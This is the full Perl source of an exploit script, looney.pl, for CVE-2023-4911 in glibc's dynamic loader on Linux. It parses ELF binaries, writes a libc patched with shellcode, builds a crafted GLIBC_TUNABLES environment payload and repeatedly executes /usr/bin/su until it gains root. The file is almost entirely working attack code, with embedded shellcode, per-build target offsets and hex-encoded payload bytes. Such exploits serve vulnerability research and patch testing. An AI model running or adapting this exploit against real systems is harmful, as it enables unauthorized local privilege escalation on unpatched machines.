looney.pl

#!/usr/bin/perl
# looney.pl
# written by isra - isra _replace_by_@_ fastmail.net - https://hckng.org
#
# https://git.sr.ht/~hckng/exploits/tree/master/item/looney.pl
# https://github.com/ilv/exploits/blob/main/looney.pl
# 
# version 0.1 - october 2023
#
# Exploit for CVE-2023-4911 (Linux x86_64) based on [1]
# 
#  - It combines Perl & Assembly
#  - Perl is used for looking up the necessary data and patching libc
#  - Assembly is used for calling execve with crafted envp
#  - Tricks described at [2] are used for copying assembly payload in memory
#    and execute it
#  - Tricks described at [3] are used for adjusting the assembly payload
#  - Only standard modules are used
#  - Tested on GLIBC 2.36-9+deb12u1 (Debian 12 x86_64)
#
# to run:
#     $ ulimit -s unlimited && perl looney.pl
#
#
# [1] https://haxx.in/files/gnu-acme.py
# [2] https://hckng.org/articles/perlhacking-I-peek-poke-xsub.html
# [3] https://hckng.org/articles/perljam-elf64-virus.html
#

use B;
use strict;
use Config;
use integer;
use 5.008001;
use DynaLoader;
use POSIX "uname";
use POSIX ":sys_wait_h";


###############################################################################
# specific stuff, pretty much copy/paste from gnu-acme.py 
###############################################################################
my %ARCH = (
    "x86_64" => {
        "shellcode" => [
            "\x6a\x6b\x58\x0f\x05\x89\xc7\x89\xc2\x89\xc6\x6a\x75\x58",
            "\x0f\x05\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x2f\x73",
            "\x50\x48\x89\xe7\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01",
            "\x01\x01\x31\xf6\x56\x6a\x08\x5e\x48\x01\xe6\x56\x48\x89",
            "\xe6\x31\xd2\x6a\x3b\x58\x0f\x05"
        ],
        "top" => 0x800000000000,
        "aslr_bits" => 34
    },
    # not tested, but should work
    "aarch64" => {
        "shellcode" => [
            "\xe8\x15\x80\xd2\x01\x00\x00\xd4\xe1\x03\x00\xaa\xe2\x03",
            "\x00\xaa\x68\x12\x80\xd2\x01\x00\x00\xd4\xee\x45\x8c\xd2",
            "\x2e\xcd\xad\xf2\xee\xe5\xc5\xf2\xee\x65\xee\xf2\x0f\x0d",
            "\x80\xd2\xee\x3f\xbf\xa9\xe0\x03\x00\x91\xe1\x03\x1f\xaa",
            "\xe2\x03\x1f\xaa\xa8\x1b\x80\xd2\x01\x00\x00\xd4"
        ],
        "top" => 0x1000000000000,
        "aslr_bits" => 30
    }
);

my %TARGETS = (
    "a8daca28288575ffc8c7641d40901b0148958fb1" => 580,
    "a99db3715218b641780b04323e4ae5953d68a927" => 561,
    "61ef896a699bb1c2e4e231642b2e1688b2f1a61e" => 560,
    "9a9c6aeba5df4178de168e26fe30ddcdab47d374" => 580,
    "69c048078b6c51fa8744f3d7cff3b0d9369ffd53" => 561,
    "3602eac894717d56555552c84fc6b0e4d6a4af72" => 561
);

# find path to write patched libc
sub find_hax_path {
    my $fh     = shift;
    my $offset = shift;

    my $pos = $offset;
    while($pos > 0) {
        seek $fh, $pos, "SEEK_SET";
        read $fh, my $buff, 0x02;
        my ($p0, $p1) = unpack("C C", $buff);
        if($p0 != 0 && $p0 != 47 && $p1 == 0) {
            return (pack("C*", $p0), $pos - $offset);
        }
        $pos--;
    }
    return (undef, undef);
}

# write patched libc at hax_path with injected shellcode
sub patch_libc {
    my $libc_path = shift;
    my $libc_main = shift;
    my $libc_size = shift;
    my $new_path  = shift;
    my $shellcode = shift;

    open my $new_fh, ">:raw", $new_path or die "$!\n";
    open my $libc_fh, "<:raw", $libc_path or die "$!\n";
    
    seek $libc_fh, 0, "SEEK_SET";
    read $libc_fh, my $buff, $libc_main;

    syswrite $new_fh, $buff;
    syswrite $new_fh, $shellcode;

    seek $libc_fh, $libc_main + length($shellcode), "SEEK_SET";
    read $libc_fh, my $buff, $libc_size - $libc_main - length($shellcode);

    syswrite $new_fh, $buff;

    close $new_fh;
    close $libc_fh;
}


###############################################################################
# ELF parsing 
###############################################################################

# elf header keys
my @e_keys = (
    'ei_mag0', 'ei_mag1', 'ei_mag2', 'ei_mag3', 'ei_class', 'ei_data', 
    'ei_version', 'ei_osabi', 'ei_abiversion', #ei_pad ignored
    'e_type', 'e_machine', 'e_version', 'e_entry', 'e_phoff', 'e_shoff',
    'e_flags', 'e_ehsize', 'e_phentsize', 'e_phnum', 'e_shentsize', 'e_shnum',
    'e_shstrndx'
);

# section header table keys
my @sh_keys = (
    'sh_name', 'sh_type', 'sh_flags', 'sh_addr', 'sh_offset', 'sh_size',
    'sh_link', 'sh_info', 'sh_addralign', 'sh_entsize'
);

# symbol table keys
my @st_keys = (
    'st_name', 'st_info', 'st_other', 'st_shndx', 'st_value', 'st_size'
);

# read & unpack binary content
sub ru {
    my $fh  = shift;
    my $tpl = shift;
    my $sz  = shift;

    read $fh, my $buff, $sz;
    return unpack($tpl, $buff);
}

# make hash to easily handle various headers 
sub mk_hash {
    my $hashref = shift;
    my $keysref = shift;
    my $valsref = shift;

    for(my $i = 0; $i < @{$keysref}; $i++) {
        $hashref->{$keysref->[$i]} = $valsref->[$i];
    }
}

# elf header
sub parse_ehdr {
	my $fh   = shift;
    my $ehdr = shift;

    my @hdr = ru($fh, "C a a a C C C C C x7 S S I q q q I S S S S S S", 0x40);
    mk_hash($ehdr, \@e_keys, \@hdr);
}

# section header table
sub parse_shtab {
	my $fh     = shift;
    my $ehdr   = shift;
    my $shtab  = shift;
    my $strtab = shift;

    seek $fh, $ehdr->{'e_shoff'}, "SEEK_SET"; 
    for (my $i = 0; $i < $ehdr->{'e_shnum'}; $i++) {
        my %sh;
        my @hdr = ru($fh, "I I q q q q I I q q", $ehdr->{'e_shentsize'});
        mk_hash(\%sh, \@sh_keys, \@hdr);
        push @{$shtab}, \%sh;

        # read content of section header entry of type 'STRTAB'
        if($sh{'sh_type'} == 3) {
            my $tmpstr;
            my $curr_offset = tell $fh;
            seek $fh, $sh{'sh_offset'}, "SEEK_SET";
            read $fh, $tmpstr, $sh{'sh_size'};
            seek $fh, $curr_offset, "SEEK_SET";
            $strtab->{$sh{'sh_offset'}} = $tmpstr;
        }
    }
}

sub secname {
    my $ndx = shift;
    my $str = shift;

    my $s = substr($str, $ndx);
    my $r = substr($s, 0, index($s, "\0"));
}

# section names from string table
sub parse_secnames {
    my $fh     = shift;
    my $ehdr   = shift;
    my $shtab  = shift;
    my $strtab = shift;

    my $symtab_ndx;
    my $shstrtab = $shtab->[$ehdr->{'e_shstrndx'}];
    for(my $i = 0; $i < $ehdr->{'e_shnum'}; $i++) {
        my $name = secname(
            $shtab->[$i]{'sh_name'}, 
            $strtab->{$shstrtab->{'sh_offset'}}
        );
        # add 'name' to each section header entry
        $shtab->[$i]{'name'} = $name;

        $symtab_ndx = $i if($name eq '.dynsym');
    }

    return $symtab_ndx;
}

# get content by section name
sub find_section_content {
	my $fh    = shift;
    my $ehdr  = shift;
    my $shtab = shift;
	my $name  = shift;

    for(my $i = 0; $i < $ehdr->{'e_shnum'}; $i++) {
        if($shtab->[$i]{'name'} eq $name) {
        	seek $fh, $shtab->[$i]{'sh_offset'}, "SEEK_SET";
        	read $fh, my $buff, $shtab->[$i]{'sh_size'};
        	return $buff;
        }
    }
}

# get offset by section name
sub find_section_offset {
	my $fh    = shift;
    my $ehdr  = shift;
    my $shtab = shift;
	my $name  = shift;

    for(my $i = 0; $i < $ehdr->{'e_shnum'}; $i++) {
        if($shtab->[$i]{'name'} eq $name) {
        	return $shtab->[$i]{'sh_offset'};
        }
    }
}

# symbol table
sub parse_symtab {
	my $fh         = shift;
    my $shtab      = shift;
    my $strtab     = shift;
    my $symtab     = shift;
    my $symtab_ndx = shift;

    my $symtab_sec  = $shtab->[$symtab_ndx];
    my $sh_link     = $shtab->[$symtab_sec->{'sh_link'}];
    my $num_entry   = $symtab_sec->{'sh_size'}/$symtab_sec->{'sh_entsize'};

    my $curr_file_offset = tell $fh;
    seek $fh, $symtab_sec->{'sh_offset'}, "SEEK_SET";
    for (my $i = 0; $i < $num_entry; $i++) {
        my %sym;
        my @hdr = ru($fh, "I C C S q q", $symtab_sec->{'sh_entsize'});
        mk_hash(\%sym, \@st_keys, \@hdr);

        my $type = $sym{'st_info'} & 0x0f;
        my $name = secname(
            $sym{'st_name'}, 
            $strtab->{$sh_link->{'sh_offset'}}
        );
        # add 'name' to each symbol 
        $sym{'name'} = $name;
        push @{$symtab}, \%sym;
    }
    seek $fh, $curr_file_offset, "SEEK_SET";
}

# find symbol by name
sub find_symbol {
	my $symtab = shift;
	my $name   = shift;

    for(my $i = 0; $i < $#{$symtab}; $i++) {
        if($symtab->[$i]{'name'} eq $name) {
        	return $symtab->[$i]{'st_value'};
        }
    }
}

# basic ELF parsing
sub parse_elf {
    my $f = shift;

    my (@shtab, @symtab, %ehdr, %strtab, $symtab_ndx);

    print "[*] Starting ELF parsing\n";
    open my $fh, '<', $f or die "[-] Couldn't open $f for parsing\n";
    parse_ehdr($fh, \%ehdr);
    parse_shtab($fh, \%ehdr, \@shtab, \%strtab);
    $symtab_ndx = parse_secnames($fh, \%ehdr, \@shtab, \%strtab);
    parse_symtab($fh, \@shtab, \%strtab, \@symtab, $symtab_ndx);
    print "[*] Ending ELF parsing\n";

    return ($fh, \%ehdr, \@shtab, \@symtab);
}

# parse libc to get start_main symbol
sub parse_libc {
    my $f = shift;

    my ($fh, $ehdr, $shtab, $symtab) = parse_elf($f);
    my $symbol = find_symbol($symtab, "__libc_start_main");

    return $symbol;
}

# parse su to obtain ld_path, hax_path and hax_offset
sub parse_su {
    my $f = shift;

    my ($fh, $ehdr, $shtab, $symtab) = parse_elf($f);
    my $ld_path = find_section_content($fh, $ehdr, $shtab, ".interp");
    my $offset = find_section_offset($fh, $ehdr, $shtab, ".dynstr");
    my ($hax_path, $hax_offset) = find_hax_path($fh, $offset);

    chop($ld_path);
    return ($ld_path, $hax_path, $hax_offset);
}

# parse ld to obtain build_id
sub parse_ld {
    my $f = shift;

    my ($fh, $ehdr, $shtab, $symtab) = parse_elf($f);
    my $ld_build_id = find_section_content(
        $fh, $ehdr, $shtab, ".note.gnu.build-id"
    );
    
    $ld_build_id = unpack("H*", substr($ld_build_id, -20));
    return $ld_build_id;
}


###############################################################################
# POKE memory and build/execute payload
###############################################################################

# copy $bytes of length $len into address $location
# see https://hckng.org/articles/perlhacking-I-peek-poke-xsub.html
sub poke {
    my($location, $bytes, $len) = @_;
    my $addr = pack("Q", $location);

    my $dummy = 'X' x $len;
    my $dummy_addr = \$dummy + 0;
    my $sz = 16 + $Config{ivsize};
    my $ghost_sv_contents = unpack("P".$sz, pack("Q", $dummy_addr));
    substr( $ghost_sv_contents, 8 + 4 + 4, 8 ) = $addr;    

    my $ghost_string_ref = bless( \ unpack(
        "Q",
        do { no warnings 'pack'; pack( 'P', $ghost_sv_contents.'' ) },
    ), 'B::PV' )->object_2svref;
    eval 'substr($$ghost_string_ref, 0, $len) = $bytes';
    return $len;
}

sub mmap {
    my ($addr, $size, $protect, $flags) = @_;
    my $ret = syscall(9, $addr, $size, $protect, $flags, -1, 0);
    return $ret;
}

sub mprotect {
    my ($addr, $size, $protect) = @_;
    my $ret = syscall(10, $addr, $size, $protect);
    return $ret;
}

# payload for calling /usr/bin/su --help with execve and a crafted envp
# payload is adjusted according to $adjust, $addr and $offset
# sample: https://git.sr.ht/~hckng/exploits/tree/master/item/looney_sample.s
sub build_payload {
    my $adjust = shift;
    my $addr   = shift;
    my $offset = shift;

    my $p1 = "";
    $p1 .= "\xe8\x3b\x03\x02\x00\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x75";
    $p1 .= "\x00\x2d\x2d\x68\x65\x6c\x70\x00\x47\x4c\x49\x42\x43\x5f\x54\x55";
    $p1 .= "\x4e\x41\x42\x4c\x45\x53\x3d\x67\x6c\x69\x62\x63\x2e\x6d\x65\x6d";
    $p1 .= "\x2e\x74\x61\x67\x67\x69\x6e\x67\x3d\x67\x6c\x69\x62\x63\x2e\x6d";
    $p1 .= "\x65\x6d\x2e\x74\x61\x67\x67\x69\x6e\x67\x3d";

    # add $adjust P's and fill the rest with null bytes
    for(my $i = 0; $i < $adjust; $i++) {
        $p1 .= pack("C", 0x50);
    }

    for(my $i = 0; $i < 580-$adjust; $i++) {
        $p1 .= pack("C", 0x00);
    } 

    my $p2 = "";
    $p2 .= "\x00";
    $p2 .= "\x47\x4c\x49\x42\x43\x5f\x54\x55\x4e\x41\x42\x4c\x45\x53\x3d\x67";
    $p2 .= "\x6c\x69\x62\x63\x2e\x6d\x65\x6d\x2e\x74\x61\x67\x67\x69\x6e\x67";
    $p2 .= "\x3d\x67\x6c\x69\x62\x63\x2e\x6d\x65\x6d\x2e\x74\x61\x67\x67\x69";
    $p2 .= "\x6e\x67\x3d\x58\x58\x58\x58\x58\x58\x58\x58\x00\x47\x4c\x49\x42";
    $p2 .= "\x43\x5f\x54\x55\x4e\x41\x42\x4c\x45\x53\x3d\x67\x6c\x69\x62\x63";
    $p2 .= "\x2e\x6d\x65\x6d\x2e\x74\x61\x67\x67\x69\x6e\x67\x3d\x67\x6c\x69";
    $p2 .= "\x62\x63\x2e\x6d\x65\x6d\x2e\x74\x61\x67\x67\x69\x6e\x67\x3d\x58";
    $p2 .= "\x58\x58\x58\x58\x58\x58\x00\x47\x4c\x49\x42\x43\x5f\x54\x55\x4e";
    $p2 .= "\x41\x42\x4c\x45\x53\x3d\x67\x6c\x69\x62\x63\x2e\x6d\x65\x6d\x2e";
    $p2 .= "\x74\x61\x67\x67\x69\x6e\x67\x3d\x59\x59\x59\x59\x59\x59\x59\x59";
    $p2 .= "\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59";
    $p2 .= "\x00";

    # add stack address
    my @binaddr = unpack("a6", pack("Q", $addr));
    for(my $i = 0; $i < 6; $i++) {
        $p2 .= $binaddr[$i];
    }
    $p2 .= "\x00";

    # add offset 16382 times
    $offset = pack("Q", $offset & 0xFFFFFFFFFFFFFFFF);
    my @binoffset = unpack("a8", $offset);
    for(my $i = 0; $i < 16382; $i++) {
        for(my $j = 0; $j < 8; $j++) {
            $p2 .= $binoffset[$j];
        }
    } 

    my $p3 = "";
    $p3 .= "\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00";
    $p3 .= "\x5e\x48\x31\xc0\x48\x8d\x3e\x50\xb9\x2f\x00\x00\x00\xff\xc9\x48";
    $p3 .= "\x8d\x9e\x43\x03\x00\x00\x53\x75\xf4\xb9\x81\x01\x00\x00\xff\xc9";
    $p3 .= "\x48\x8d\x5e\x12\x53\x75\xf7\x48\x8d\x9e\x3c\x03\x00\x00\x53\xb9";
    $p3 .= "\xac\x00\x00\x00\xff\xc9\x48\x8d\x5e\x12\x53\x75\xf7\x48\x8d\x9e";
    $p3 .= "\x02\x03\x00\x00\x53\x48\x8d\x9e\xc7\x02\x00\x00\x53\x48\x8d\x9e";
    $p3 .= "\x8b\x02\x00\x00\x53\x48\x8d\x5e\x13\x53\x48\x89\xe2\x50\x48\x8d";
    $p3 .= "\x5e\x0c\x53\x57\x48\x89\xe6\x48\x31\xc0\xb8\x3b\x00\x00\x00\x0f";
    $p3 .= "\x05\x48\x31\xd2\xb8\x3c\x00\x00\x00\x0f\x05";

    my $payload = $p1.$p2.$p3;
    return $payload;
}

# allocate payload and execute it background
sub exec_payload {
	my $payload = shift;
	
	my $ptr = mmap(0, length($payload), 3, 33);
    if($ptr == -1) {
        die "[-] Failed to allocate memory for payload\n";
    }

    # copy payload into memory 
    poke($ptr, $payload, length($payload));

    if(mprotect($ptr, length($payload), 5) == -1) {
        die "[-] Failed to make allocated payload executable\n";
    }

    # get sub reference to execute allocated payload
    my $f = DynaLoader::dl_install_xsub("looney", $ptr, __FILE__);

    my $child_pid = fork();
    if(!$child_pid) {
        # execute
        &$f;
        exit(0);
    }

    # copy/paste from gnu-acme.py
    my $start_time = time();
    while(1){
        my $pid = waitpid($child_pid, WNOHANG);
        if($pid == $child_pid){
            return 0
        }

        my $current_time = time();
        if(($current_time - $start_time) >= 2.0) {
            print "[!] got r00t?\n";
            waitpid($child_pid, 0);
            return 0x1337
        }
    }
}

sub aslr_enabled {
    open my $fh, '<', '/proc/sys/kernel/randomize_va_space' or die "[-] $!\n";
    my $v = <$fh>;
    close $fh;

    return $v;
}

###############################################################################
# main code
###############################################################################

print "\n";
print "*" x 49;
print "\n* looney.pl - jet another CVE-2023-4911 exploit *\n";
print   "*         by isra - hckng.org - isra.cl         *\n";
print "*" x 49;
print "\n\n";

print "[+] Starting...";
print "\n";
my $mch = (uname())[4];
die "Arch $mch not supported\n" if(!exists $ARCH{$mch});
die "ASLR not enabled\n" if(!aslr_enabled());

print "[+] Trying to parse libc\n";
my $libc_path = (DynaLoader::dl_findfile("libc.so.6"))[0];
my $libc_size = (stat $libc_path)[7];
my $libc_main = parse_libc($libc_path);
print "[+] Using libc at $libc_path\n";
printf("[+] __libc_start_main = 0x%x\n", $libc_main);

my $su_path = "/usr/bin/su";
print "[+] Target = $su_path\n";
print "[+] Trying to parse su\n";
my ($ld_path, $hax_path, $hax_offset) = parse_su($su_path);

die "[-] Couldn't find hax path/offset\n" if(!$hax_path or !$hax_offset);
printf(
    "[+] Using hax path %s at offset %d\n", 
    unpack("C*", $hax_path), $hax_offset
);

print "[+] Trying to parse ld\n";
my $ld_build_id = parse_ld($ld_path);
print "[+] ld.so build id = $ld_build_id\n";

if(!exists $TARGETS{$ld_build_id}) {
    die "[-] No target for build id $ld_build_id\n";
}

print "[+] Trying to create hax path and patch libc\n";
mkdir $hax_path, 0755 if(! -d $hax_path);
patch_libc(
    $libc_path,  
    $libc_main,
    $libc_size,
    "$hax_path/libc.so.6",
    join("", @{$ARCH{$mch}{"shellcode"}})
);
die "[-] Couldn't patch libc\n" if(!-f "$hax_path/libc.so.6");

my $lsb = ((0x100 - (length($su_path) + 1 + 8)) & 7) + 8;
my $stack_addr = $ARCH{$mch}{"top"} - (1 << ($ARCH{$mch}{"aslr_bits"} - 1));
$stack_addr += $lsb;
for(my $i = 0; $i < 6; $i++) {
	if( (($stack_addr >> ($i * 8)) & 0xFF) == 0 ) {
		$stack_addr |= 0x10 << ($i * 8);
	}
}
printf("[+] Using stack addr 0x%x\n", $stack_addr);

print "[+] Building payload\n";
my $payload = build_payload($TARGETS{$ld_build_id}, $stack_addr, $hax_offset);

print "[+] Entering loop for payload execution\n";
my $i = 0;
while(1) {
    print "." if($i % 0x10 == 0);
    print "\n" if($i % 0x500 == 0);

    if(exec_payload($payload) == 0x1337) {
        print "[+] Done ($i iterations)\n";
        exit(0)
    }
    $i++;
}